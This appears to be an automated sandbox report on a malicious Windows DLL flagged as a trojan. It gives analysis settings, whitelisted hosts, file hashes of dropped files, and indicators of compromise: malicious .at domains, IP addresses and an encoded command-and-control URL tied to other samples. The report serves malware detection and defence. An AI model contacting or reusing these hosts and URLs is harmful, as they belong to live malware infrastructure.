                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:24
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.winDLL@11/19@2/1
                                    EGA Information:Failed
                                    HDC Information:
                                    • Successful, ratio: 41% (good quality ratio 39.7%)
                                    • Quality average: 80%
                                    • Quality standard deviation: 27.2%
                                    HCA Information:
                                    • Successful, ratio: 71%
                                    • Number of executed functions: 35
                                    • Number of non-executed functions: 33
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .dll
                                    • Override analysis time to 240s for rundll32
Warnings:
                                    • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                    • Excluded IPs from analysis (whitelisted): 95.100.218.79, 20.82.210.154, 20.54.110.249, 2.20.178.10, 2.20.178.56, 40.112.88.60, 104.94.89.6, 2.20.178.33, 2.20.178.24, 152.199.19.161
                                    • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, e12564.dspb.akamaiedge.net, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ie9comview.vo.msecnd.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, cs9.wpc.v0cdn.net
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtOpenKeyEx calls found.

                                    Simulations

                                    Behavior and APIs

                                    No simulations

                                    Joe Sandbox View / Context

                                    IPs

Match: 87.106.18.141
Associated Sample Name / URL | Detection | Context
a3.exe | malicious | api5.feen007.at/favicon.ico
a04.dll | malicious | app10.laptok.at/favicon.ico
50.dll | malicious | api10.laptok.at/favicon.ico
08dVB7v4wB6w.vbs | malicious | chat.allager.at/jvassets/xI/t64.dat
http://far.gaploop.at/api1/m9Nm6sQ5MZ2/kV1dHuUchwgj0p/w9B514uuWuNRu_2Fovw1B/iJjn_2FjOcMhSdO6/hY1viFbhIYH_2BS/FrMYbmCHgkAwm_2Btu/e29igvEBi/gLOHtqdBI_2B3sibC3Cg/z_2F8IFoCH_2BWJVdUY/ri7hwzyuAx2q5RHXJmbXhc/ygopWPWJKwti5/IOOS1u46/4ZXFc4Ok4SPekiO7ot2QyT_/2FJdMyYfAP/7FTqw0rQZL_2B1pan/wh8ruTp3dham/UlLIzAZ_2Fn/esHGZHp93qljV_/0A_0DvFEgD08oveRu1RDL/3nPBhZLduxccr2_2/FS5iRLSxGBo44/0xUc | malicious | far.gaploop.at/api1/m9Nm6sQ5MZ2/kV1dHuUchwgj0p/favicon.ico
4EyIHmLYEBBs.vbs | malicious | chat.allager.at/jvassets/xI/t64.dat

                                    Domains

Match: api10.laptok.at
Associated Sample Name / URL | Detection | Context
50.dll | malicious | 87.106.18.141
11.dll | malicious | 35.228.184.80
documentation_27396.vbs | malicious | 35.189.93.117
info_70397.vbs | malicious | 35.189.93.117
SecuriteInfo.com.Win32.Kryptik.HJSQ.12709.dll | malicious | 35.189.93.117
SecuriteInfo.com.Trojan.Win32.Save.a.30469.dll | malicious | 35.189.93.117
22.dll | malicious | 34.65.108.95
2200.dll | malicious | 34.65.108.95
urban.dll | malicious | 34.65.25.23
SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll | malicious | 34.65.15.6
SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll | malicious | 34.65.144.159
SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll | malicious | 34.65.144.159
SecuriteInfo.com.Generic.mg.f77e7bd43f365593.dll | malicious | 34.65.144.159
NJPcHPuRcG.dll | malicious | 34.65.144.159
Ne6A4k8vK6.dll | malicious | 34.65.144.159
File_78476.xlsb | malicious | 35.228.31.40
u8xtCk7fq8.dll | malicious | 35.228.31.40
2200.dll | malicious | 35.228.31.40
SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll | malicious | 35.228.31.40
Attached_File_898318.xlsb | malicious | 35.228.31.40

                                    ASN

Match: ONEANDONE-ASBrauerstrasse48DE
Associated Sample Name / URL | Detection | Context
a3.exe | malicious | 87.106.18.141
a04.dll | malicious | 87.106.18.141
50.dll | malicious | 87.106.18.141
Quote -0071021.exe | malicious | 217.160.0.7
DHL SHIPMENT.HTML | malicious | 217.160.0.196
hwIILTIn0n.exe | malicious | 217.160.0.17
just.exe | malicious | 212.227.15.158
2WK7SGkGVZ.exe | malicious | 74.208.236.156
0n1pEFuGKC.exe | malicious | 74.208.236.145
VmbABLKNbD.exe | malicious | 74.208.236.108
Update-KB250-x86.exe | malicious | 74.208.5.20
Update-KB2984-x86.exe | malicious | 74.208.5.20
justifi4c.exe | malicious | 213.165.67.118
CY2075400.exe | malicious | 213.165.67.115
Justificante de la transfer.exe | malicious | 212.227.15.142
IMAGE1001.exe | malicious | 213.165.67.115
Exq3dXFDHe.exe | malicious | 217.160.0.243
MIN8gr0eOj.exe | malicious | 74.208.236.228
solicitud de presupuesto.exe | malicious | 217.160.0.21
Payment Requisition October 4.xlsx | malicious | 74.208.236.226

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{C2243AE9-2779-11EC-90EB-ECF4BBEA1588}.dat
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:Microsoft Word Document
                                    Category:dropped
                                    Size (bytes):29272
                                    Entropy (8bit):1.7694526431217736
                                    Encrypted:false
                                    SSDEEP:48:Iw/Gcpr2GwpLuG/ap8fGIpcMGvnZpvoGobPqp9oGo4fhzpmLGWb5nTpUGWb7T6p7:rVZuZM2hWVtqif7fhzMZZ66stBXapB
                                    MD5:5F38D3B6CD6DCB6133FA4568E8AFA2C1
                                    SHA1:40AF099DED37781639FB476F50B7FA65474684F8
                                    SHA-256:EDA9AA7EFFFAFA29ED90217E21192761860F29B9C58D06A282F84FF25E364D81
                                    SHA-512:DCE00F5DFEE4685E46E7279E46534B706D039A57F70ED6C8D0516EBA3C25261AB3AE805E6D0CE90C2064FC6B7FC68F063B24632DEFEDDF418206B913BE879279
                                    Malicious:false
                                    Reputation:low
                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{DD28BAEB-2779-11EC-90EB-ECF4BBEA1588}.dat
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:Microsoft Word Document
                                    Category:dropped
                                    Size (bytes):29272
                                    Entropy (8bit):1.7698468890647774
                                    Encrypted:false
                                    SSDEEP:96:rLZIZp29WctMxifH4x2xzMLxOxbx65xSxB0xbxpB:rLZIZp29WctoifHkmzMleV6/yBwVpB
                                    MD5:4E3474B49787A29BDCA2DF6CE06599A9
                                    SHA1:85F0E57BB0A9F59BB65E8992F13EE3A672A10B30
                                    SHA-256:AEE2DF902E7ACEC926E03297FD67BA8762CCBCA7A6E81A28B23F240D8E6E9351
                                    SHA-512:B5D212E7789BC193D358E2E27100AA4294FAAF8263F3DC4AA539FC052D4F5E7B8D7A24A706C33E7F4B32B55533F9E93E72C4DC50DB01CAAD3C9CF03C65C40045
                                    Malicious:false
                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{C2243AEB-2779-11EC-90EB-ECF4BBEA1588}.dat
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:Microsoft Word Document
                                    Category:dropped
                                    Size (bytes):28168
                                    Entropy (8bit):1.924630739251775
                                    Encrypted:false
                                    SSDEEP:96:reZxQe6oBSppHjN2NW2M6B9Zaq5AXX2l9TMZaq5AX6A:reZxQe6okppHjN2NW2M6BmqK2l7qKKA
                                    MD5:76B2F71618816F746BE6A756E61D9574
                                    SHA1:298CE55345D46FE76B74C3836C619BA98579BCCC
                                    SHA-256:12D79A99EA47B29192AE132004E1470A34B757EA63D7FF7F9C1720739D5B3F92
                                    SHA-512:7BFB42F2DCB48FAD6D7EE357759E1B97648C726CB52E01726B437EDF22EB83EBFEE54742C9E9CD0FA3C92F242652879412373F860E7C382254EFB45F6CCEAF12
                                    Malicious:false
                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{DD28BAED-2779-11EC-90EB-ECF4BBEA1588}.dat
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:Microsoft Word Document
                                    Category:dropped
                                    Size (bytes):28128
                                    Entropy (8bit):1.9149036050589494
                                    Encrypted:false
                                    SSDEEP:96:rHZsQ06qBSJjN2mWLMLpfYKkgm/SVYK7Kkgm/HA:rHZsQ06qkJjN2mWLMLpfYxaVY+xfA
                                    MD5:B0E31D8A8F80E5107F50E167D5F64CE3
                                    SHA1:B0F568C02F3B875C2B009C74F82E138F0495E4EB
                                    SHA-256:31C9F99F030865BFF0AFA9D658003A6E0FEDB2763C8C69BC23C7B66B549EABA8
                                    SHA-512:0E42904AC4580536C9B1630693AB4DA87A284791AF546C4E5AB73CD4CA22B65F069A84437DCE7A866A3FC80253F3ACAFE352E0DF364C1AA81C59F77BB18D5766
                                    Malicious:false
                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):656
                                    Entropy (8bit):5.116265607751289
                                    Encrypted:false
                                    SSDEEP:12:TMHdNMNxOEiUzUzCnWimI002EtM3MHdNMNxOEiUzUzCnWimI00OYGVbkEtMb:2d6NxOY42SZHKd6NxOY42SZ7YLb
                                    MD5:B9289B02F73BA2696CE382F25B252768
                                    SHA1:34866CE7763DD1439472F01A062BAF1DE35AB40C
                                    SHA-256:02DCEC0FD7F8268958B6D9D1E629E45AF6E498A20E23BBF3961F8FA57936A67F
                                    SHA-512:4A45B4EACD678F305CCA348D948A363DDA19067A69ED083546F34660CEE816D16A282FD16D443C56B3BA01E0FC0896CB96D3CE6B37F79B70F309F8525B3A4B47
                                    Malicious:false
                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x97c31b95,0x01d7bb86</date><accdate>0x97c31b95,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x97c31b95,0x01d7bb86</date><accdate>0x97c31b95,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):653
                                    Entropy (8bit):5.147158389776371
                                    Encrypted:false
                                    SSDEEP:12:TMHdNMNxe2kCOsCnWimI002EtM3MHdNMNxe2kCOsCnWimI00OYGkak6EtMb:2d6NxrYSZHKd6NxrYSZ7Yza7b
                                    MD5:0E2824AEBA5263BDBEB6F6C1B697201D
                                    SHA1:249FBF817F78E7030D4B51FF1C2D596003F7B022
                                    SHA-256:EF74B42C008153CAFE31A10A9B1518ECE461BB8BF3D605C275494097EF10048A
                                    SHA-512:E87F7261B11064B1A71AA98D4E9A69F97B5A86EEFA88A6B7A737BEA763C6A2691188E4AACEF19AFBD3F2158953F3906F2189F59D01F2FB4F753C7B84A0B07BB6
                                    Malicious:false
                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x97bbf46c,0x01d7bb86</date><accdate>0x97bbf46c,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x97bbf46c,0x01d7bb86</date><accdate>0x97bbf46c,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):662
                                    Entropy (8bit):5.136384701855738
                                    Encrypted:false
                                    SSDEEP:12:TMHdNMNxvLiUzUzCnWimI002EtM3MHdNMNxvLiUzUzCnWimI00OYGmZEtMb:2d6NxvL42SZHKd6NxvL42SZ7Yjb
                                    MD5:D6293B418E61C0E16419449C7AEC6137
                                    SHA1:CDE20431F39715389797994CD61049E6FBE3A812
                                    SHA-256:60DE51742FA97CEBA37658D67BFE11E8B1A4B2E4724BAA33427799ACB59CA0C2
                                    SHA-512:E4789D2CBF3925E4A89D4971446CF2D9C8023DEBFB6AA50EA1B7E85F8FA120A765593665D3DFBE2816DBFE4DE4D3C0534F52F09325E24498134F36E8ABF39CD2
                                    Malicious:false
                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x97c31b95,0x01d7bb86</date><accdate>0x97c31b95,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x97c31b95,0x01d7bb86</date><accdate>0x97c31b95,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):647
                                    Entropy (8bit):5.135109105672943
                                    Encrypted:false
                                    SSDEEP:12:TMHdNMNxiCOsCnWimI002EtM3MHdNMNxiCOsCnWimI00OYGd5EtMb:2d6NxeSZHKd6NxeSZ7YEjb
                                    MD5:2FD98F3ADDA3603CF1D1F96647FA06CA
                                    SHA1:4CC088DFA5CA39E3A41FA12080CAF29D9C809506
                                    SHA-256:D6EF9422DFD69F0913DA2E7245F967B8577CA90D71E5F9ADE29B62531EAC4833
                                    SHA-512:12050C0FBA5A7134104DC4EC634E29A8085D5FA401FDB22A649C25E863568CDB17E787390263B521D5E1FF5E70C8D9B4A8ABF5C1BF9BAA4FAE350727A1EF4E86
                                    Malicious:false
                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x97bbf46c,0x01d7bb86</date><accdate>0x97bbf46c,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x97bbf46c,0x01d7bb86</date><accdate>0x97bbf46c,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):656
                                    Entropy (8bit):5.142854959846915
                                    Encrypted:false
                                    SSDEEP:12:TMHdNMNxhGwiUzUzCnWimI002EtM3MHdNMNxhGwiUzUzCnWimI00OYG8K075EtMb:2d6NxQE42SZHKd6NxQE42SZ7YrKajb
                                    MD5:8D563F07516320E95AE089BBC291A6EB
                                    SHA1:22E510ABFCDC78066565F209B5D9E3BC7C7B64FB
                                    SHA-256:70549C4B108CAED8AAC5664A94774E3B2B9204B65EB0C214A62D743B35E915F3
                                    SHA-512:03BAD30FA86E3C97DDE165CD7FF5E7AC23D8D75FC77DE706E84EB12CADD2A9CCE1FC838BE6C3875EDC5D0E211E3795D30A098449FC84C8D1CF55F561B328865F
                                    Malicious:false
                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x97c31b95,0x01d7bb86</date><accdate>0x97c31b95,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x97c31b95,0x01d7bb86</date><accdate>0x97c31b95,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):653
                                    Entropy (8bit):5.12013045220898
                                    Encrypted:false
                                    SSDEEP:12:TMHdNMNx0niUzUzCnWimI002EtM3MHdNMNx0niUzUzCnWimI00OYGxEtMb:2d6Nx0342SZHKd6Nx0342SZ7Ygb
                                    MD5:5797054F1BF80218E67B8EB13BA79DCC
                                    SHA1:117B6C85528CB5FDED08DC064E3C34B5FC0F027A
                                    SHA-256:AB40749924948AFD3098C35DA1B5DA3965D24B16ED2A5BE721E0FDE3943424D8
                                    SHA-512:A3B9E863A17DB97FE8E29C4955CC42B0B47835C5BE86F9E31A796725CE2773B78C34EB2912634A39D87940B5580E424050C953DA697984F7C42F89956BEBBD47
                                    Malicious:false
                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x97c31b95,0x01d7bb86</date><accdate>0x97c31b95,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x97c31b95,0x01d7bb86</date><accdate>0x97c31b95,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):656
                                    Entropy (8bit):5.158929528907078
                                    Encrypted:false
                                    SSDEEP:12:TMHdNMNxxCOsCnWimI002EtM3MHdNMNxxCOsCnWimI00OYG6Kq5EtMb:2d6NxPSZHKd6NxPSZ7Yhb
                                    MD5:DDEEB8CBF6C19764CC86C0C33580C3CD
                                    SHA1:84D9A085AD938C9692A7717DCFCDFF116D01B047
                                    SHA-256:02EC86E92A9BCE56B88199A7971994C681973BFA4FEDBEF43ECF2EBFD09C7B60
                                    SHA-512:4D628D541CA0C8AA53F4F052F565FFB1CB7BE09D3A007F207E13A8ED7A54B7787F5B410D144B6E7F6E1382A8B25D7F7C13DC49F30EC9F74C5DAFA84034EFFE72
                                    Malicious:false
                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x97bbf46c,0x01d7bb86</date><accdate>0x97bbf46c,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x97bbf46c,0x01d7bb86</date><accdate>0x97bbf46c,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):659
                                    Entropy (8bit):5.129267751681902
                                    Encrypted:false
                                    SSDEEP:12:TMHdNMNxcCOsCnWimI002EtM3MHdNMNxcCOsCnWimI00OYGVEtMb:2d6NxASZHKd6NxASZ7Ykb
                                    MD5:9D5AC7B16558A6CC28492AC28E1454F3
                                    SHA1:05928854C329AA44A0871B6A88BEFB7BF57177D6
                                    SHA-256:A7215397C2A465C7AE54EFBCA71E60373B5C31074B2700BF490D93227D02BE95
                                    SHA-512:EBCCCA5DBAD89FA75EAF1791B2E4243EEB7F29812A5B73DF8E10664CEEC6BF43392DADD531FD3EA5D9E7468A79FBE18767F6C9E5ADC7D5E6939B8D7F034760BD
                                    Malicious:false
                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x97bbf46c,0x01d7bb86</date><accdate>0x97bbf46c,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x97bbf46c,0x01d7bb86</date><accdate>0x97bbf46c,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):653
                                    Entropy (8bit):5.1202160243666865
                                    Encrypted:false
                                    SSDEEP:12:TMHdNMNxfnCOsCnWimI002EtM3MHdNMNxfnCOsCnWimI00OYGe5EtMb:2d6Nx9SZHKd6Nx9SZ7YLjb
                                    MD5:10D82FAC8F0A69FB555E9811B2D0A6E3
                                    SHA1:CB719FACB674AC7851A920127EA1A4E8ADC3DB6D
                                    SHA-256:3606FA33CA1ED25B52554EE60670FE6BB14E4461ADCB76415E6C339A63F468F2
                                    SHA-512:C9CBBEB850EFDB0FE4AB85CD32C960A2191A5190CA31919FCB8F358BE3B79C9A7BFFF1AA55594476CBC44B2425C2247515B5BC4E76DA5B8E6F0D4DBF26D6722E
                                    Malicious:false
                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x97bbf46c,0x01d7bb86</date><accdate>0x97bbf46c,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x97bbf46c,0x01d7bb86</date><accdate>0x97bbf46c,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                                    C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:modified
                                    Size (bytes):89
                                    Entropy (8bit):4.411614364643764
                                    Encrypted:false
                                    SSDEEP:3:oVXUYzbUrWqAW8JOGXnEYzbUrWgn:o9UYzwrl9qEYzwrv
                                    MD5:00ECA81511259FF58F097AA3701BB729
                                    SHA1:E002895091FC5D9EF7461950886E9ABBD71AC219
                                    SHA-256:09C86668E713E5ECC72A8478CF3FBD049B94AD6C777B7708C883CDA92240BCCF
                                    SHA-512:ABCDA1E47CDCCE103C95F860A5ABD550AF0EA8E07C26C5301D16B5E2260D972FC0757B4547A0D53EDC709CDFF1EFD10643BBABA258E882ADF79427694FD4FA64
                                    Malicious:false
                                    Preview: [2021/10/07 16:21:31.574] Latest deploy version: ..[2021/10/07 16:21:31.574] 11.211.2 ..
                                    C:\Users\user\AppData\Local\Temp\~DF302033FC2C26A542.TMP
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):12933
                                    Entropy (8bit):0.4062588728086082
                                    Encrypted:false
                                    SSDEEP:12:c9lCg5/9lCgeK9l26an9l26an9l8fREF9l8fRE9lTqSd3SfGDE:c9lLh9lLh9lIn9lIn9lo09loE9lW6it
                                    MD5:71D24CEC0984F1D3C4CECED1D6C926F8
                                    SHA1:EA75BEC02ACD81F67EA2E7A050E01AB4235AF077
                                    SHA-256:F62B14D503003ECCF51AAB536D7B469E41789CA4B2311BF555B50F3E0B40D26E
                                    SHA-512:2982730976D55BC2B2436D340D67DEC61D66F9AD8801EB8CA725D67363E1DE52C2A4000DA7E605155512D860A9324FA628A87BDD35B83A7D0F9554CA329039BF
                                    Malicious:false
                                    C:\Users\user\AppData\Local\Temp\~DF677CE89DC6A9E9DB.TMP
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):40209
                                    Entropy (8bit):0.6802519082787714
                                    Encrypted:false
                                    SSDEEP:96:kBqoxKAuvScS+Ye0FOna+Zaq5AXXCa+Zaq5AXXxa+Zaq5AXXS:kBqoxKAuqR+Ye0FOnaTqKCaTqKxaTqKS
                                    MD5:5C7DEF89A84EAA98430FE7027564DF78
                                    SHA1:D44DA4534C89ADA5E783ADCB8ABEA0AB95CA6543
                                    SHA-256:66C837632C5CC0A0B18B23E886B8337839514DD7FE99FD4131A44245712064B8
                                    SHA-512:748FC1AA8D28970F1EDF70A508D99535AA388F0C8B8C66ADC7D18DD85674FC03806A34CA4125A049DDF307B8D40138B61C53946817623160E8414C3A9E2E18B9
                                    Malicious:false
                                    C:\Users\user\AppData\Local\Temp\~DFB9EDA9C4DE41A518.TMP
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):40129
                                    Entropy (8bit):0.6668058381904368
                                    Encrypted:false
                                    SSDEEP:96:kBqoxKAuvScS+Z3lUXcfYPKkgm/QfYPKkgm/JYPKkgm/a:kBqoxKAuqR+Z3lUXcfYPxIfYPxhYPxy
                                    MD5:D6EE8E5C275A86A97B906F4AEDDA6134
                                    SHA1:63C95AA3BE00D6B6C69EB6A0E42D91FCE098718C
                                    SHA-256:B53595D99A0C685EBB1CC8CE1618F6EFD33F2B4B75BD07166DB2CC7ABA0B88FE
                                    SHA-512:913250ECBE792ADCD00C6A409EA38BDA6ACF6B3F1C057A8B7BD4A7FF9784B3B179EF3C333BB5A9C999CD549BECA40765260CC3F9E42EFF50734EB6987FB38FF0
                                    Malicious:false
                                    C:\Users\user\AppData\Local\Temp\~DFED4BB5723C2F8450.TMP
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):12933
                                    Entropy (8bit):0.40471074511354194
                                    Encrypted:false
                                    SSDEEP:24:c9lLh9lLh9lIn9lIn9lojv9lojv9lWj/b:kBqoIjwjOjz
                                    MD5:5CA3A3BB7ABE9DC52F89ACAE580DD584
                                    SHA1:35081451F3DAE228AE3AFA7AAF835D9F2AA1A0EA
